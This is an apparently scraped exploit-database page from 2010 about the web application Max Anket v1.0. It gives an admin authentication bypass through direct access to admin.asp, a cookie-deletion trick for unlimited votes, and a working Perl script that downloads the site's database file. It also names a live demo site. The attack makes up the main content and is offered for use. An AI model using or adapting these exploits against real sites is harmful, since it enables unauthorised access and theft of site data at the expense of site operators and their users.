Home / os / win7

[webapps / 0day] - Max Anket v1.0 - Multiple Remote Vulnerab

Posted on 11 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Max Anket v1.0 - Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Max Anket v1.0 - Multiple Remote Vulnerabilities by KnocKout in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================ Max Anket v1.0 - Multiple Remote Vulnerabilities ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&#039; __ /&#039;__` / \__ /&#039;__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /&#039; _ ` / /_/_\_&lt;_ /&#039;___ / /`&#039;__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I&#039;m KnocKout member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [+] Greatz : Inj3ct0r Team &amp; DaiMon &amp; BARCOD3 ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~Web App. : Max Anket v1.0 ~Software: http://www.aspdunyasi.com/goster.asp?id=8 ~Vulnerability Style : Auth Bypass, Database Disclosure, unlimited votes Vulnerabilities [~]Date : &quot;11.10.2010&quot; ----------- ~Demo: http://www.hellamarine.com/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ Explotation [Auth Bypass]~~~~~~~~~~~ http://VICTIM/admin.asp ~~~~~~~~ Explotation [Unlimited votes]~~~~~~~~~~~ Votes navigation, and &quot;Kullandi = [YourPCNAME]&quot; delete cookie. ~~~~~~~~ Explotation [Disclosure Exploit]~~~~~~~~~~~ use LWP::Simple; use LWP::UserAgent; system(&#039;cls&#039;); system(&#039;title Max Anket v1.0 Database Disclosure Exploit&#039;); system(&#039;color 4&#039;); if(@ARGV &lt; 2) { print &quot;[-]Ornegi inceleyin &quot;; &amp;help; exit(); } sub help() { print &quot;[+] usage1 : perl $0 site.com /path/ &quot;; print &quot;[+] usage2 : perl $0 localhost / &quot;; } print &quot; ************************************************************************ &quot;; print &quot;* Max Anket v1.0 Database Disclosure Exploit * &quot;; print &quot;* Exploited By : KnocKout * &quot;; print &quot;* Contact: knockoutr[at]msn[dot]com * &quot;; print &quot;* -- * &quot;; print &quot;********************************************************************* &quot;; ($TargetIP, $path, $File,) = @ARGV; $File=&quot;Anket.mdb&quot;; my $url = &quot;http://&quot; . $TargetIP . $path . $File; print &quot; wait!!! &quot;; my $useragent = LWP::UserAgent-&gt;new(); my $request = $useragent-&gt;get($url,&quot;:content_file&quot; =&gt; &quot;C:/db.mdb&quot;); if ($request-&gt;is_success) { print &quot;[+] $url Exploited! &quot;; print &quot;[+] Database saved to C:/db.mdb &quot;; exit(); } else { print &quot;[!] Exploiting $url Failed ! [!] &quot;.$request-&gt;status_line.&quot; &quot;; exit(); } ================================ GoodLuck. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-11]</pre></body></html>

 

TOP